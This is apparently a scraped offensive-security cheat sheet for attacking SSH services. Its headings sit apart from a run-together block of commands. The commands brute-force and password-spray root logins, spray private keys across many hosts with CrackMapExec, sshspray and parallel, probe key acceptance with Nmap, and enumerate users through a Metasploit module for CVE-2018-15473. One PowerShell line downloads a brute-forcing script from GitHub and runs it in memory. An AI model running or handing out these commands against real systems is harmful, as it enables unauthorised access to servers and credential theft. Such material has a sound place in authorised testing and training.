Secure Shell
From Windows:
A list of targets with different SSH ports:
Spray with a private key and passphrase Passw0rd! using CME:
Using sshspray:
Using Nmap:
CVE-2018-15473
Last updated
PS > curl https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe -o plink.exe
PS > IEX(New-Object Net.WebClient).DownloadString("https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer/raw/master/ssh-putty-brute.ps1")
PS > ssh-putty-brute -h 192.168.1.11 -p 22 -u root -pw 'Passw0rd!'
PS > ssh-putty-brute -h 192.168.1.11 -p 22 -u root -pw (gc .\passwords.txt)$ das parse ssh -raw | cut -c 7- | awk -F: '{print $1}' > ssh_hosts
$ das parse ssh -raw | cut -c 7- | awk -F: '{print $2}' > ssh_ports
$ paste ssh_hosts ssh_ports | while read host port; do cme ssh $host -u root -p root --port $port; done$ cme ssh 192.168.1.11 -u root -p 'Passw0rd!' --key-file id_rsa$ python3 sshspray.py -u root -i ~/.ssh/id_rsa -t ssh.txt
$ parallel --eta -j3 python3 sshspray.py -i {} -u root -t ssh.txt ">" output_{}.log ::: id_rsa1 id_rsa2 id_rsa3$ nmap -p 22 --script ssh-publickey-acceptance --script-args "ssh.usernames={'root', 'user'}, ssh.privatekeys={'./id_rsa1', './id_rsa2'}" 192.168.1.11msf > use auxiliary/scanner/ssh/ssh_enumusers
msf > set CHECK_FALSE true
msf > set RHOSTS file:ssh.txt
msf > set THREADS 25
msf > set USERNAME root
msf > run